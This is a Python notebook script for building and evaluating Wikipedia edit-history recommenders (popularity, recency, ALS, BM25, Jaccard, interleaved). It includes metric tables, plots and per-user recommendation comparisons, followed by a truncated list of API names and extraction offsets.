feather.write_feather(histories_dev, '../histories_dev_2021-05-28.feather')
feather.write_feather(histories_test, '../histories_test_2021-05-28.feather')
# +
resurface_userids, discovery_userids = wr.get_resurface_discovery(histories_train, histories_dev)
print("%d out of %d userids are resurfaced (%.1f%%)" % (len(resurface_userids), len(userids), 100*float(len(resurface_userids))/len(userids)))
print("%d out of %d userids are discovered (%.1f%%)" % (len(discovery_userids), len(userids), 100*float(len(discovery_userids))/len(userids)))
# -
wr.save_pickle((resurface_userids, discovery_userids), '../resurface_discovery_users_2021-05-28.pickle')
# # FIG Rama and other examples
print("Number of edits by Rama in a year: {}".format(len(all_histories.loc[all_histories.user == 'Rama'])))
print("Number of pages edited: {}".format(len(all_histories.loc[all_histories.user == 'Rama'].drop_duplicates(subset=['pageid']))))
# +
from pull_edit_histories import get_edit_history
oneuser = get_edit_history(user="Thornstrom",
latest_timestamp="2021-05-28T22:02:09Z",
earliest_timestamp="2020-05-28T22:02:09Z")
oneuser = pd.DataFrame(oneuser).loc[:,cols]
# -
wr.print_user_history(all_histories, user="Rama")
wr.print_user_history(all_histories, user="Meow")
# # Build matrix for implicit collaborative filtering
# +
# %%time
# Get the user/page edit counts
for_implicit = histories_train.groupby(["userid","pageid"]).count().first_timestamp.reset_index().rename(columns={'first_timestamp':'edits'})
for_implicit.loc[:,'edits'] = for_implicit.edits.astype(np.int32)
# +
row = np.array([p2i[p] for p in for_implicit.pageid.values])
col = np.array([u2i[u] for u in for_implicit.userid.values])
implicit_matrix_coo = coo_matrix((for_implicit.edits.values, (row, col)))
implicit_matrix = csc_matrix(implicit_matrix_coo)
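# Toy sketch (illustration only, with made-up counts) of the same construction:
# rows are page indices, columns are user indices, values are edit counts.
# >>> from scipy.sparse import coo_matrix, csc_matrix
# >>> csc_matrix(coo_matrix(([3, 1, 2], ([0, 0, 1], [0, 1, 1])))).toarray()
# array([[3, 1],
#        [0, 2]])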
# -
# %%time
wr.save_pickle(implicit_matrix,'../implicit_matrix_2021-05-28.pickle')
# ### Test the matrix and indices
implicit_matrix = wr.load_pickle('../implicit_matrix_2021-05-28.pickle')
# +
# Crude item to item recs by looking for items edited by the same editors (count how many editors overlap)
veditors = np.flatnonzero(implicit_matrix[t2i['Hamburger'],:].toarray())
indices = np.flatnonzero(np.sum(implicit_matrix[:,veditors] > 0,axis=1))
totals = np.asarray(np.sum(implicit_matrix[:,veditors] > 0 ,axis=1)[indices])
sorted_order = np.argsort(totals.squeeze())
[i2t.get(i, "") + " " + str(total[0]) for i,total in zip(indices[sorted_order],totals[sorted_order])][::-1]
# -
# Histories of editors who had that item
for ved in veditors:
print("\n\n\n" + i2n[ved])
wr.print_user_history(all_histories, user=i2n[ved])
# # Implicit recommendation
implicit_matrix = wr.load_pickle('../implicit_matrix_2021-05-28.pickle')
p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t = wr.load_pickle('../lookup_tables_2021-05-28.pickle')
bm25_matrix = bm25_weight(implicit_matrix, K1=100, B=0.25)
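# bm25_weight rescales the raw edit counts with BM25-style weighting (roughly,
# damping the influence of very heavily edited rows); K1 and B play their usual
# BM25 roles.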
num_factors =200
regularization = 0.01
os.environ["OPENBLAS_NUM_THREADS"] = "1"
model = implicit.als.AlternatingLeastSquares(
factors=num_factors, regularization=regularization
)
model.fit(bm25_matrix)
wr.save_pickle(model,'../als%d_bm25_model.pickle' % num_factors)
model = wr.load_pickle('../als200_bm25_model_2021-05-28.pickle')
results = model.similar_items(t2i['Steven Universe'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
u = n2u["Rama"]
recommendations = model.recommend(u2i[u], bm25_matrix.tocsc(), N=1000, filter_already_liked_items=False)
[ ("*" if implicit_matrix[ind,u2i[u]]>0 else "") +
'%s %.4f' % (i2t[ind], score) + ' %d' % (implicit_matrix[ind,:]>0).sum()
for ind, score in recommendations]
# ## Grid search results
grid_search_results = wr.load_pickle("../implicit_grid_search.pickle")
pd.DataFrame(grid_search_results)
pd.DataFrame([[i['num_factors'], i['regularization']] + list(i['metrics'].values()) for i in grid_search_results],
columns = ['num_factors','regularization'] + list(grid_search_results[0]['metrics'].keys()))
grid_search_results_bm25 = wr.load_pickle("../implicit_grid_search_bm25.pickle")
pd.DataFrame([[i['num_factors'], i['regularization']] + list(i['metrics'].values()) for i in grid_search_results_bm25],
columns = ['num_factors','regularization'] + list(grid_search_results_bm25[0]['metrics'].keys()))
# # BM25 Recommendation
from implicit.nearest_neighbours import BM25Recommender
# +
bm25_matrix = bm25_weight(implicit_matrix, K1=20, B=1)
bm25_matrix = bm25_matrix.tocsc()
sns.distplot(implicit_matrix[implicit_matrix.nonzero()],bins = np.arange(0,100,1),kde=False)
sns.distplot(bm25_matrix[bm25_matrix.nonzero()],bins = np.arange(0,100,1),kde=False)
# -
K1 = 100
B = 0.25
model = BM25Recommender(K1, B)
model.fit(implicit_matrix)
wr.save_pickle(model, '../bm25_model_2021-05-28.pkl')
results = model.similar_items(t2i['<NAME>'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
a = ['Steven Universe 429.4746',
'List of Steven Universe episodes 178.4544',
'Demon Bear 128.7237',
'Legion of Super Heroes (TV series) 128.7237',
'The Amazing World of Gumball 126.3522',
'Steven Universe Future 123.9198']
results = model.similar_items(t2i['Steven Universe'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
results = model.similar_items(t2i['<NAME>'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
results = model.similar_items(t2i['Hamburger'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
u = n2u["Rama"]
recommendations = model.recommend(u2i[u], implicit_matrix.astype(np.float32), N=1000, filter_already_liked_items=True)
[ ("*" if implicit_matrix[ind,u2i[u]]>0 else "") +
'%s %.4f' % (i2t[ind], score)
for ind, score in recommendations]
plt.plot([ score for i,(ind, score) in enumerate(recommendations) if implicit_matrix[ind,u2i[u]]==0])
wr.save_pickle(model, "b25_model.pickle")
model = wr.load_pickle("b25_model.pickle")
# # Evaluate models
# ## Item to item recommendation
results = model.similar_items(t2i['Steven Universe'],20)
['%s %.4f' % (i2t[ind], score) for ind, score in results]
# ## User to item recommendations
# +
# Check out a specific example
u = n2u["HyprMarc"]
wr.print_user_history(clean_histories, userid=u)
# -
u = n2u["HyprMarc"]
recommendations = model.recommend(u2i[u], implicit_matrix, N=100, filter_already_liked_items=False)
[ ("*" if implicit_matrix[ind,u2i[u]]>0 else "") +
'%s %.4f' % (i2t[ind], score)
for ind, score in recommendations]
# # Visualize implicit embeddings
model = wr.load_pickle('../als150_model.pickle')
# +
# Only plot the ones with over 3 entries
nonzero = np.flatnonzero(implicit_matrix.sum(axis=1))
indices = np.squeeze(np.asarray(np.sum(implicit_matrix[nonzero,:],axis=1))) > 3
indices = nonzero[indices]
# -
len(indices)
# Visualize the collaborative filtering item vectors, embedding into 2D space with UMAP
# nonzero = np.flatnonzero(implicit_matrix.sum(axis=1))
# indices = nonzero[::100]
embedding = umap.UMAP().fit_transform(model.item_factors[indices,:])
plt.figure(figsize=(10,10))
plt.plot(embedding[:,0], embedding[:,1],'.')
# _ = plt.axis('square')
# ## Visualize actors in the embeddings space
# +
edit_counts = np.squeeze(np.asarray(np.sum(implicit_matrix[indices,:],axis=1)))
log_edit_counts = np.log10(np.squeeze(np.asarray(np.sum(implicit_matrix[indices,:],axis=1))))
emb_df = pd.DataFrame({'dim1':embedding[:,0].squeeze(),
'dim2':embedding[:,1].squeeze(),
'title':[i2t[i] for i in indices],
'edit_count':edit_counts,
'log_edit_count':log_edit_counts
})
# -
actors = ['<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME> (actor)',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>']
actor_indices = [t2i[a] for a in actors]
edit_counts = np.squeeze(np.asarray(np.sum(implicit_matrix[actor_indices,:],axis=1)))
log_edit_counts = np.log10(np.squeeze(np.asarray(np.sum(implicit_matrix[actor_indices,:],axis=1))))
embedding = umap.UMAP().fit_transform(model.item_factors[actor_indices,:])
emb_df = pd.DataFrame({'dim1':embedding[:,0].squeeze(),
'dim2':embedding[:,1].squeeze(),
'title':[i2t[i] for i in actor_indices],
'edit_count':edit_counts,
'log_edit_count':log_edit_counts
})
key = np.zeros(len(actors))
key[:8] = 1
fig = px.scatter(data_frame=emb_df,
x='dim1',
y='dim2',
hover_name='title',
color=key,
hover_data=['edit_count'])
fig.update_layout(
autosize=False,
width=600,
height=600,)
fig.show()
# +
# Full embedding plotly interactive visualization
emb_df = pd.DataFrame({'dim1':embedding[:,0].squeeze(),
'dim2':embedding[:,1].squeeze(),
'title':[i2t[i] for i in indices],
'edit_count':edit_counts,
'log_edit_count':log_edit_counts
})
fig = px.scatter(data_frame=emb_df,
x='dim1',
y='dim2',
hover_name='title',
color='log_edit_count',
hover_data=['edit_count'])
fig.update_layout(
autosize=False,
width=600,
height=600,)
fig.show()
# -
# # Evaluate on test set
# +
# Load the edit histories in the training set and the test set
histories_train = feather.read_feather('../histories_train_2021-05-28.feather')
histories_test = feather.read_feather('../histories_test_2021-05-28.feather')
histories_dev = feather.read_feather('../histories_dev_2021-05-28.feather')
implicit_matrix = wr.load_pickle('../implicit_matrix_2021-05-28.pickle')
p2t, t2p, u2n, n2u, p2i, u2i, i2p, i2u, n2i, t2i, i2n, i2t = wr.load_pickle('../lookup_tables_2021-05-28.pickle')
userids, pageids = wr.load_pickle('../users_and_pages_2021-05-28.pickle')
resurface_userids, discovery_userids = wr.load_pickle('../resurface_discovery_users_2021-05-28.pickle')
results = {}
# -
wr.display_recs_with_history(
recs,
userids[:100],
histories_test,
histories_train,
p2t,
u2n,
recs_to_display=5,
hist_to_display=10,
)
# ## Most popular
# +
# %%time
K=20
rec_name = "Popularity"
prec = recommenders.PopularityRecommender(histories_train)
precs = prec.recommend_all(userids, K)
wr.save_pickle(precs, "../" + rec_name +"_recs.pickle")
# +
results[rec_name] = wr.get_recs_metrics(
histories_dev, precs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# -
# ## Most recent
# %%time
# Most recent
K=20
rrec = recommenders.MostRecentRecommender(histories_train)
rrecs = rrec.recommend_all(userids, K, interactions=histories_train)
rec_name = "Recent"
wr.save_pickle(rrecs, "../" + rec_name +"_recs.pickle")
len(resurface_userids)
results ={}
results[rec_name] = wr.get_recs_metrics(
histories_dev, rrecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# ## Most frequent
# %%time
# Sorted by frequency of edits
K=20
frec = recommenders.MostFrequentRecommender(histories_train)
frecs = frec.recommend_all(userids, K, interactions=histories_train)
rec_name = "Frequent"
wr.save_pickle(frecs, "../" + rec_name +"_recs.pickle")
results[rec_name] = wr.get_recs_metrics(
histories_dev, frecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# ## BM25
# %%time
K=20
brec = recommenders.MyBM25Recommender(model, implicit_matrix)
brecs = brec.recommend_all(userids, K, u2i=u2i, n2i=n2i, i2p=i2p, filter_already_liked_items=False)
rec_name = "bm25"
wr.save_pickle(brecs, "../" + rec_name +"_recs.pickle")
# filter_already_liked_items = False
results[rec_name] = wr.get_recs_metrics(
histories_dev, brecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# filter_already_liked_items = True
rec_name = "bm25_filtered"
brecs_filtered = brec.recommend_all(userids, K, u2i=u2i, n2i=n2i, i2p=i2p, filter_already_liked_items=True)
wr.save_pickle(brecs_filtered, "../" + rec_name +"_recs.pickle")
results[rec_name] = wr.get_recs_metrics(
    histories_dev, brecs_filtered, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# ## ALS Implicit collaborative filtering
model_als = wr.load_pickle('../als200_bm25_model_2021-05-28.pickle')
# %%time
rec_name = "als"
K=20
irec = recommenders.ImplicitCollaborativeRecommender(model_als, bm25_matrix.tocsc())
irecs = irec.recommend_all(userids, K, i2p=i2p, filter_already_liked_items=False)
wr.save_pickle(irecs, "../" + rec_name +"_recs.pickle")
results[rec_name] = wr.get_recs_metrics(
histories_dev, irecs, K, discovery_userids, resurface_userids, bm25_matrix.tocsc(), i2p, u2i)
results[rec_name]
rec_name = "als_filtered"
K=20
irec = recommenders.ImplicitCollaborativeRecommender(model_als, bm25_matrix.tocsc())
irecs_filtered = irec.recommend_all(userids, K, i2p=i2p, filter_already_liked_items=True)
results[rec_name] = wr.get_recs_metrics(
histories_dev, irecs_filtered, K, discovery_userids, resurface_userids, bm25_matrix.tocsc(), i2p, u2i)
results[rec_name]
wr.save_pickle(irecs_filtered, "../" + rec_name +"_recs.pickle")
show(pd.DataFrame(results).T)
# ## Jaccard
# %%time
# Sorted by Jaccard
K=20
rrec = recommenders.MostRecentRecommender(histories_train)
recent_pages_dict = rrec.all_recent_only(K, userids, interactions=histories_train)
jrec = recommenders.JaccardRecommender(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t, i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)
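# The Jaccard score between two pages is presumably the overlap of their editor
# sets: |editors(A) & editors(B)| / |editors(A) | editors(B)|. For example, pages
# edited by {u1, u2, u3} and {u2, u3, u4} would score 2/4 = 0.5.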
jrecs = jrec.recommend_all(userids,
K,
num_lookpage_pages=1,
recent_pages_dict=recent_pages_dict,
interactions=histories_train)
wr.save_pickle(jrecs,"jaccard-1_recs.pickle")
rec_name = "Jaccard"
results[rec_name] = wr.get_recs_metrics(
histories_dev, jrecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
wr.display_recs_with_history(
jrecs,
userids[:30],
histories_test,
histories_train,
p2t,
u2n,
recs_to_display=5,
hist_to_display=10,
)
# %%time
# Sorted by Jaccard
K=5
jrec = recommenders.JaccardRecommender(implicit_matrix, p2i=p2i, t2i=t2i, i2t=i2t, i2p=i2p, n2i=n2i, u2i=u2i, i2u=i2u)
jrecs = jrec.recommend_all(userids[:1000],
10,
num_lookpage_pages=50,
recent_pages_dict=recent_pages_dict,
interactions=histories_train)
print("Jaccard")
print("Recall @ %d: %.1f%%" % (K, 100*wr.recall(histories_test, jrecs, K)))
print("Prop resurfaced: %.1f%%" % (100*wr.prop_resurface(jrecs, K, implicit_matrix, i2p, u2i)))
print("Recall @ %d (discovery): %.1f%%" % (K, 100*wr.recall(histories_test, jrecs, K, userid_subset=discovery_userids)))
print("Recall @ %d (resurface): %.1f%%" % (K, 100*wr.recall(histories_test, jrecs, K, userid_subset=resurface_userids)))
# ## Interleaved
recs.keys()
# +
# Interleaved jaccard and recent
K=20
rec_name = "Interleaved"
print(rec_name)
intrec = recommenders.InterleaveRecommender()
intrecs = intrec.recommend_all(K, [recs['Recent'], recs['bm25_filtered']])
wr.save_pickle(intrecs, "../" + rec_name +"_recs.pickle")
# -
results[rec_name] = wr.get_recs_metrics(
histories_dev, intrecs, K, discovery_userids, resurface_userids, implicit_matrix, i2p, u2i)
results[rec_name]
# # Report on evaluation results
# ## Hard coded metrics
# +
results = {}
results["Popularity"] = {'recall': 0.16187274312040842,
'ndcg': 0.0005356797596941751,
'resurfaced': 0.6213422985929523,
'recall_discover': 0.11947959996459864,
'recall_resurface': 0.2624396388830569,
'ndcg_discover': 0.000410354483750028,
'ndcg_resurface': 0.0008329819416998272}
results["Recent"] = {'recall': 22.618602913709378,
'ndcg': 0.14306080818547054,
'resurfaced': 71.13808990163118,
'recall_discover': 0.03982653332153288,
'recall_resurface': 76.18097837497375,
'ndcg_discover': 0.00011494775493754298,
'ndcg_resurface': 0.4821633227780786}
results["Frequent"] = {'recall': 20.834889802017184,
'ndcg': 0.11356953338215306,
'resurfaced': 76.10353629684971,
'recall_discover': 0.035401362952473675,
'recall_resurface': 70.17635943732941,
'ndcg_discover': 9.90570471847343e-05,
'ndcg_resurface': 0.38274923359395385}
results["ALS"] = {'recall': 5.488108579255385,
'ndcg': 0.026193145556306998,
'resurfaced': 16.251556468683848,
'recall_discover': 1.146119125586335,
'recall_resurface': 15.788368675204703,
'ndcg_discover': 0.004817135435898367,
'ndcg_resurface': 0.0769022655123215}
results["ALS_filtered"] = {'recall': 0.9027518366330469,
'ndcg': 0.003856703716094881,
'resurfaced': 0.0,
'recall_discover': 1.2832994070271706,
'recall_resurface': 0.0,
'ndcg_discover': 0.005482465270193466,
'ndcg_resurface': 0.0}
results["BM25"] = {'recall': 18.945336819823186,
'ndcg': 0.1015175508656068,
'resurfaced': 74.0469742248786,
'recall_discover': 1.3939286662536507,
'recall_resurface': 60.581566239764854,
'ndcg_discover': 0.004204510293040833,
'ndcg_resurface': 0.332367864833573}
results["BM25_filtered"] = {'recall': 1.8148424853691942,
'ndcg': 0.008622285155255174,
'resurfaced': 0.14848711243929774,
'recall_discover': 2.522347110363749,
'recall_resurface': 0.1364686122191896,
'ndcg_discover': 0.011740495141426633,
'ndcg_resurface': 0.0012251290280766518}
results["Interleaved"] = {'recall': 21.382766778732414,
'ndcg': 0.12924273396038563,
'resurfaced': 42.478676379031256,
'recall_discover': 1.8364457031595716,
'recall_resurface': 67.75141717404996,
'ndcg_discover': 0.006943981897312752,
'ndcg_resurface': 0.4193652616867473}
results_df = pd.DataFrame(results).T
results_df.reset_index(inplace=True)
# -
# ## Table of results
results_df
# ### FIG Table for post
# +
def scatter_text(x, y, text_column, data, title, xlabel, ylabel):
"""Scatter plot with country codes on the x y coordinates
Based on this answer: https://stackoverflow.com/a/54789170/2641825"""
# Create the scatter plot
p1 = sns.scatterplot(x, y, data=data, size = 8, legend=False)
# Add text besides each point
for line in range(0,data.shape[0]):
p1.text(data[x][line]+0.01, data[y][line],
data[text_column][line], horizontalalignment='left',
size='medium', color='black', weight='semibold')
# Set title and axis labels
plt.title(title)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
return p1
def highlight_max(s):
'''
highlight the maximum in a Series yellow.
'''
is_max = s == s.max()
return ['background-color: yellow' if v else '' for v in is_max]
results_df.sort_values("recall", ascending=False).style.apply(highlight_max, subset=["recall",
"ndcg",
"resurfaced",
"recall_discover",
"recall_resurface",
"ndcg_discover",
"ndcg_resurface",]).format({"recall": "{:.1f}%",
"ndcg": "{:.3f}",
"resurfaced": "{:.1f}%",
"recall_discover": "{:.1f}%",
"recall_resurface": "{:.1f}%",
"ndcg_discover": "{:.3f}",
"ndcg_resurface": "{:.3f}",
})
# -
colnames = ["Recommender", "Recall@20", "nDCG@20","Resurfaced","Recall@20 discovery","Recall@20 resurface","nDCG@20 discovery","nDCG@20 resurface"]
#apply(highlight_max, subset=colnames[1:]).
results_df.columns = colnames
results_df.sort_values("Recall@20", ascending=False).style.\
format({"Recall@20": "{:.1f}%",
"nDCG@20": "{:.3f}",
"Resurfaced": "{:.1f}%",
"Recall@20 discovery": "{:.1f}%",
"Recall@20 resurface": "{:.1f}%",
"nDCG@20 discovery": "{:.3f}",
"nDCG@20 resurface": "{:.3f}",
})
# ## Scatter plots (resurface vs discover)
fig = px.scatter(data_frame=results_df,
x='ndcg_discover',
y='ndcg_resurface',
hover_name='index')
# hover_name='title',)
fig.show()
fig = px.scatter(data_frame=results_df,
x='recall_discover',
y='recall_resurface',
hover_name='index')
# hover_name='title',)
fig.show()
# ### FIG Scatterplot for post
x = 2*[results_df.loc[results_df.Recommender == "Interleaved","Recall@20 resurface"].values[0]]
y = [0, results_df.loc[results_df.Recommender == "Interleaved","Recall@20 discovery"].values[0]]
# +
sns.set_theme(style="darkgrid")
matplotlib.rcParams.update({'font.size': 48, 'figure.figsize':(8,5), 'legend.edgecolor':'k'})
plt.figure(figsize=(12,7))
A = results_df.loc[:,'Recall@20 discovery']
B = results_df.loc[:,'Recall@20 resurface']
x = 2*[results_df.loc[results_df.Recommender == "Interleaved","Recall@20 discovery"].values[0]]
y = [-1, results_df.loc[results_df.Recommender == "Interleaved","Recall@20 resurface"].values[0]]
plt.plot(x,y,":k")
x[0] = 0
y[0] = y[1]
# plt.rcParams.update({'font.size': 48})
plt.rc('xtick', labelsize=3)
font = {'family' : 'sans-serif',
'weight' : 'normal',
'size' : 22}
matplotlib.rc('font', **font)
plt.plot(x,y,":k")
plt.plot(A,B,'.', markersize=15)
for xyz in zip(results_df.Recommender, A, B): # <--
plt.gca().annotate('%s' % xyz[0], xy=np.array(xyz[1:])+(0.05,0), textcoords='data', fontsize=18) # <--
for tick in plt.gca().xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in plt.gca().yaxis.get_major_ticks():
tick.label.set_fontsize(20)
plt.xlabel("Recall@20 discovery (%)",fontsize=20)
plt.ylabel("Recall@20 resurface (%)",fontsize=20)
plt.xlim([0,3])
plt.ylim([-2,85])
axes = plt.gca()
# -
# ## Read recs in from files
recommender_names = ['Popularity', 'Recent', 'Frequent', 'ALS', 'ALS_filtered', 'BM25', 'BM25_filtered', 'Interleaved']
recs = {rname:wr.load_pickle("../" + rname + "_recs.pickle") for rname in recommender_names}
# ## Recall curves
histories_dev = feather.read_feather('../histories_dev_2021-05-28.feather')
plt.figure(figsize=(15,10))
for rname in recommender_names:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20)
# print(recall_curve[-1])
plt.plot(recall_curve,'.-')
plt.legend(recommender_names)
plt.figure(figsize=(15,10))
for rname in recommender_names:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20, discovery_userids)
plt.plot(recall_curve,'.-')
plt.legend(recommender_names)
plt.figure(figsize=(15,10))
for rname in recommender_names:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20, resurface_userids)
plt.plot(recall_curve,'.-')
plt.legend(recommender_names)
# ### FIG Implicit vs BM25 figure
sns.set_theme(style="darkgrid")
matplotlib.rcParams.update({'font.size': 18, 'figure.figsize':(8,5), 'legend.edgecolor':'k'})
plt.figure(figsize=(10,6))
for rname in ["ALS","BM25"]:
recall_curve = wr.recall_curve(histories_dev, recs[rname], 20, discovery_userids)
plt.plot(np.array(recall_curve)*100,'.-',markersize=12)
plt.legend( ["ALS","BM25"],title="Algorithm", fontsize=16, title_fontsize=16, facecolor="w")
plt.xlabel("@N",fontsize=20)
plt.ylabel("Discovery recall (%)",fontsize=20)
_ = plt.xticks(np.arange(0,20,2),np.arange(0,20,2)+1)
# plt.gca().legend(prop=dict(size=20))
for tick in plt.gca().xaxis.get_major_ticks():
tick.label.set_fontsize(20)
for tick in plt.gca().yaxis.get_major_ticks():
tick.label.set_fontsize(20)
# # User recommendation comparison
recs_subset = ["Recent","Frequent","Popularity","Implicit","bm25","interleaved"]
print("Next edit: " + histories_dev.loc[histories_dev.userid == userid].title.values[0])
# ## FIG Rama table
# +
def bold_viewed(val, viewed_pages):
    """
    Takes a cell value and returns the css property
    `'font-weight: bold'` if the page was already viewed
    (edited) by the user, normal weight otherwise.
    """
    weight = 'bold' if val in viewed_pages else 'normal'
    return 'font-weight: %s' % weight
def color_target(val, target_page):
    """
    Takes a cell value and returns the css property
    `'color: red'` if the page is the user's held-out
    target (next-edited) page, black otherwise.
    """
    color = 'red' if val == target_page else 'black'
    return 'color: %s' % color
def display_user_recs_comparison(user_name, recs, recs_subset, train_set, test_set, N=20):
userid = n2u[user_name]
recs_table = pd.DataFrame({rec_name: [p2t[r] for r in recs[rec_name][userid][:N]] for rec_name in recs_subset})
recs_table = recs_table.reset_index()
recs_table.loc[:,"index"] = recs_table.loc[:,"index"]+1
recs_table = recs_table.rename(columns={"index":""})
viewed_pages = train_set.loc[train_set.userid == userid,["title"]].drop_duplicates(subset=["title"]).values.squeeze()
target_page = test_set.loc[test_set.userid == userid].title.values[0]
# print("Next edit: " + target_page)
s = recs_table.style.applymap(bold_viewed, viewed_pages=viewed_pages).applymap(color_target, target_page=target_page)
display(s)
# +
recs_subset = ["Recent","Frequent","Popularity","ALS","ALS_filtered","BM25","BM25_filtered"]
display_user_recs_comparison('Rama', recs, recs_subset, histories_train, histories_dev, N=10)
# -
# ## Other individuals tables
display_user_recs_comparison('Meow', recs, recs_subset, histories_train, histories_dev, N=10)
display_user_recs_comparison('KingArti', recs, recs_subset, histories_train, histories_dev, N=10)
display_user_recs_comparison('Tulietto', recs, recs_subset, histories_train, histories_dev, N=10)
display_user_recs_comparison('Thornstrom', recs, recs_subset, histories_train, histories_dev, N=10)
# ## FIG Interleaved
display_user_recs_comparison('Rama', recs,['Interleaved'], histories_train, histories_dev, N=10)
display_user_recs_comparison('KingArti', recs,['Interleaved'], histories_train, histories_dev, N=10)
N = 20
display(pd.DataFrame({rec_name: [p2t[r] for r in recs[rec_name][n2u['HenryXVII']]][:N] for rec_name in recs_subset}))
persons_of_interest = [
"DoctorWho42",
"AxelSjögren",
"<NAME>",
"Tulietto",
"LipaCityPH",
"<NAME>",
"Thornstrom",
"Meow",
"HyprMarc",
"Jampilot",
"Rama"
]
N=10
irec_500 = recommenders.ImplicitCollaborativeRecommender(model, implicit_matrix)
irecs_poi = irec_500.recommend_all([n2u[user_name] for user_name in persons_of_interest], N, u2i=u2i, n2i=n2i, i2p=i2p)
# # Find interesting users
# +
edited_pages = clean_histories.drop_duplicates(subset=['title','user']).groupby('user').userid.count()
edited_pages = edited_pages[edited_pages > 50]
edited_pages = edited_pages[edited_pages < 300]
# -
clean_histories.columns
display_user_recs_comparison("Rama", recs, recs_subset, histories_train, histories_dev, N=20)
# +
index = list(range(len(edited_pages)))
np.random.shuffle(index)
for i in index[:10]:
user_name = edited_pages.index[i]
print(user_name)
display_user_recs_comparison(user_name, recs, recs_subset, histories_train, histories_dev, N=20)
print("\n\n\n")
# +
index = list(range(len(edited_pages)))
np.random.shuffle(index)
for i in index[:10]:
print(edited_pages.index[i])
display_user_recs_comparison
wr.print_user_history(user=edited_pages.index[i],all_histories=clean_histories)
print("\n\n\n")
# -
sns.distplot(edited_pages,kde=False,bins=np.arange(0,2000,20))
# # Repetition analysis
import itertools
clean_histories.head()
clean_histories.iloc[:1000].values.tolist()
df = clean_histories
dict(zip(df.columns, range(len(df.columns))))
def identify_runs(df):
d = df.loc[:,['userid','pageid']].values.tolist()
return [(k, len(list(g))) for k,g in itertools.groupby(d)]
# %%time
runs = identify_runs(clean_histories)
# +
lens = np.array([r[1] for r in runs])
single_edits = np.sum(lens==1)
total_edits = len(clean_histories)
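# Each run contributes exactly one "first" edit; everything else in the run is a
# repetition. E.g. a run of length 4 is one first edit plus three repetitions, so
# repetitions = total_edits - len(runs), and edits belonging to multi-edit runs
# = total_edits - single_edits.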
print("Percent of edits that are part of a run: %.1f%%" % (100*(1-(float(single_edits)/total_edits))))
print("Percent of edits that are repetitions: %.1f%%" % (100*(1-len(runs)/total_edits)))
|
[
"matplotlib.pyplot.title",
"matplotlib.rc",
"numpy.sum",
"wikirecs.display_recs_with_history",
"wikirecs.print_user_history",
"recommenders.ImplicitCollaborativeRecommender",
"recommenders.MostRecentRecommender",
"recommenders.MostFrequentRecommender",
"matplotlib.pyplot.figure",
"numpy.arange",
"wikirecs.recall",
"matplotlib.pyplot.gca",
"wikirecs.get_recs_metrics",
"implicit.als.AlternatingLeastSquares",
"pandas.set_option",
"plotly.express.scatter",
"recommenders.InterleaveRecommender",
"pandas.DataFrame",
"pyarrow.feather.read_feather",
"matplotlib.rcParams.update",
"scipy.sparse.coo_matrix",
"matplotlib.pyplot.rc",
"pandas.concat",
"seaborn.set_theme",
"numpy.random.shuffle",
"matplotlib.pyplot.ylim",
"seaborn.scatterplot",
"numpy.median",
"matplotlib.pyplot.legend",
"pyarrow.feather.write_feather",
"wikirecs.get_resurface_discovery",
"umap.UMAP",
"wikirecs.save_pickle",
"recommenders.PopularityRecommender",
"wikirecs.recall_curve",
"itertools.groupby",
"matplotlib.pyplot.ylabel",
"wikirecs.load_pickle",
"recommenders.JaccardRecommender",
"os.listdir",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.xlim",
"logging.basicConfig",
"pull_edit_histories.get_edit_history",
"implicit.nearest_neighbours.BM25Recommender",
"matplotlib.pyplot.plot",
"recommenders.MyBM25Recommender",
"wikirecs.dataframe_set_subtract",
"scipy.sparse.csc_matrix",
"numpy.array",
"implicit.nearest_neighbours.bm25_weight",
"matplotlib.pyplot.xlabel",
"itables.javascript.load_datatables",
"logging.getLogger",
"wikirecs.prop_resurface"
] |
[((1071, 1088), 'itables.javascript.load_datatables', 'load_datatables', ([], {}), '()\n', (1086, 1088), False, 'from itables.javascript import load_datatables\n'), ((1109, 1147), 'pandas.set_option', 'pd.set_option', (['"""display.max_rows"""', '(100)'], {}), "('display.max_rows', 100)\n", (1122, 1147), True, 'import pandas as pd\n'), ((1148, 1186), 'pandas.set_option', 'pd.set_option', (['"""display.min_rows"""', '(100)'], {}), "('display.min_rows', 100)\n", (1161, 1186), True, 'import pandas as pd\n'), ((1207, 1228), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (1226, 1228), False, 'import logging\n'), ((1356, 1395), 'os.listdir', 'os.listdir', (['"""edit_histories_2021-05-28"""'], {}), "('edit_histories_2021-05-28')\n", (1366, 1395), False, 'import os\n'), ((1539, 1582), 'pandas.concat', 'pd.concat', (['all_histories'], {'ignore_index': '(True)'}), '(all_histories, ignore_index=True)\n', (1548, 1582), True, 'import pandas as pd\n'), ((1584, 1656), 'pyarrow.feather.write_feather', 'feather.write_feather', (['all_histories', '"""all_histories_2021-05-28.feather"""'], {}), "(all_histories, 'all_histories_2021-05-28.feather')\n", (1605, 1656), False, 'from pyarrow import feather\n'), ((1683, 1739), 'pyarrow.feather.read_feather', 'feather.read_feather', (['"""all_histories_2021-05-28.feather"""'], {}), "('all_histories_2021-05-28.feather')\n", (1703, 1739), False, 'from pyarrow import 